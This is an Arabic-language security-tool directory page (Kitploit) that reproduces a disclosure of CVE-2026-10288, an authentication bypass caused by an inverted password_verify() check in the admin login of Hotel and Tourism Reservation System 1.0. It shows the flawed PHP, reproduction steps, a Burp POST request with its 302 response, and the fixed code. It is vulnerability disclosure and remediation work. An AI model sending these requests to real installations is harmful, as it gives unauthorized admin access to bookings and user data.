Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-10288-AUTH-BYPASS — استغلال برهان المفهوم لثغرة تجاوز المصادقة الحرجة (CVE-2026-10288) في Hotel and Tourism Reservation System 1.0، مما يسمح بالوصول الإداري عن بعد بدون مصادقة عبر منطق password_verify() المقلوب. | Kitploit
أدوات/GitHubGitHub/xmyronn/cve-2026-10288-auth-bypass
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالمصادقة
GitHubxmyronn/cve-2026-10288-auth-bypass

CVE-2026-10288-AUTH-BYPASS

استغلال برهان المفهوم لثغرة تجاوز المصادقة الحرجة (CVE-2026-10288) في Hotel and Tourism Reservation System 1.0، مما يسمح بالوصول الإداري عن بعد بدون مصادقة عبر منطق password_verify() المقلوب.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

نظام حجز الفنادق والسياحة - تجاوز المصادقة

تفاصيل الثغرة

الحقلالتفاصيل
العنواننظام حجز الفنادق والسياحة - تجاوز المصادقة
البائعcode-projects.org
المنتجنظام حجز الفنادق والسياحة
الإصدار1.0
نوع الثغرةمصادقة غير صحيحة
CWECWE-287
درجة CVSS9.0 (حرجة)
متجه CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
الملف المتأثر/admin/login.php
المصادقة مطلوبةلا
قابل للاستغلال عن بعدنعم

الوصف

توجد ثغرة حرجة لتجاوز المصادقة في وظيفة تسجيل الدخول الإداري في نظام حجز الفنادق والسياحة 1.0. سبب الثغرة هو فحص شرطي مقلوب على القيمة المعادة من password_verify()، مما يجعل التطبيق يمنح الوصول عند إدخال كلمة مرور غير صحيحة ويمنع الوصول عند إدخال كلمة المرور الصحيحة. يمكن لمهاجم عن بعد غير مصادق الحصول على وصول إداري كامل عن طريق تقديم عنوان بريد إلكتروني صالح وأي كلمة مرور غير صحيحة عشوائية.


السبب الجذري

الملف: admin/login.php — الأسطر 39–46

root@kitploit:~
if(password_verify($password, $user['password'])){
    // BUG: password_verify() returns TRUE when password is CORRECT
    // but the error message is placed here instead of login logic
    echo '<div class="w3-text-red text-center">The password you entered was incorrect, please try again.</div>';
} else {
    // BUG: this block executes when password is WRONG
    // but login is granted here instead of showing an error
    $userID = $user['id'];
    login($userID);
}

تُرجع password_verify() القيمة true عندما تتطابق كلمة المرور المدخلة مع التجزئة. وضع المطور منطق النجاح داخل الفرع else (الذي يتم تنفيذه عندما تُرجع الدالة false)، مما يعني أنه يتم منح المصادقة على أي كلمة مرور غير صحيحة.


التأثير

يمكن لمهاجم عن بعد غير مصادق:

  • الحصول على وصول إداري كامل للتطبيق
  • عرض وتعديل وحذف جميع حجوزات الغرف والجولات
  • إضافة وتحرير أو إزالة الغرف والجولات والفعاليات
  • الوصول إلى جميع بيانات المستخدمين المسجلين
  • تنفيذ جميع عمليات الإدارة دون معرفة كلمة مرور المسؤول

خطوات إعادة الإنتاج

الإعداد: قم بتثبيت نظام حجز الفنادق والسياحة 1.0 على XAMPP. قم بالوصول إلى التطبيق على http://localhost/ht/.

الخطوة 1: انتقل إلى صفحة تسجيل الدخول الإداري.

http:///ht/admin/login.php

الخطوة 2: أدخل بريدًا إلكترونيًا إداريًا صالحًا مع أي كلمة مرور خاطئة.

Email: [email protected] Password: wrongpassword

الخطوة 3: انقر على تسجيل الدخول.

النتيجة: يتجاوز التطبيق المصادقة ويعيد التوجيه إلى لوحة التحكم الإدارية (index.php) — تم منح وصول إداري كامل بكلمة مرور غير صحيحة.


إثبات المفهوم (Burp Suite)

الطلب:

root@kitploit:~
POST /ht/admin/login.php HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

email=admin%40admin.com&password=test1234&login=Login

الاستجابة:

root@kitploit:~
HTTP/1.1 302 Found
Location: index.php

إعادة توجيه 302 إلى index.php تؤكد نجاح المصادقة بكلمة مرور خاطئة.


لقطات الشاشة

1. صفحة تسجيل الدخول — تم إدخال كلمة مرور خاطئة

لقطة شاشة 2026-05-11 232154

2. Burp Suite — إعادة التوجيه 302 تؤكد التجاوز

لقطة شاشة 2026-05-11 232205

3. الكود المصدري — المنطق المقلوب

لقطة شاشة 2026-05-11 232228

الإصلاح الموصى به

قم بتبديل الفروع الشرطية بحيث يتم منح تسجيل الدخول عندما تُرجع password_verify() القيمة true:

root@kitploit:~
// FIXED
if(password_verify($password, $user['password'])){
    $userID = $user['id'];
    login($userID);
} else {
    echo '<div class="w3-text-red text-center">The password you entered was incorrect, please try again.</div>';
}

المراجع

  • CWE-287: مصادقة غير صحيحة
  • نظام حجز الفنادق والسياحة — code-projects.org

تم اكتشافها بواسطة

Imad Alvi — باحث أمني مستقل

تنزيل الأداة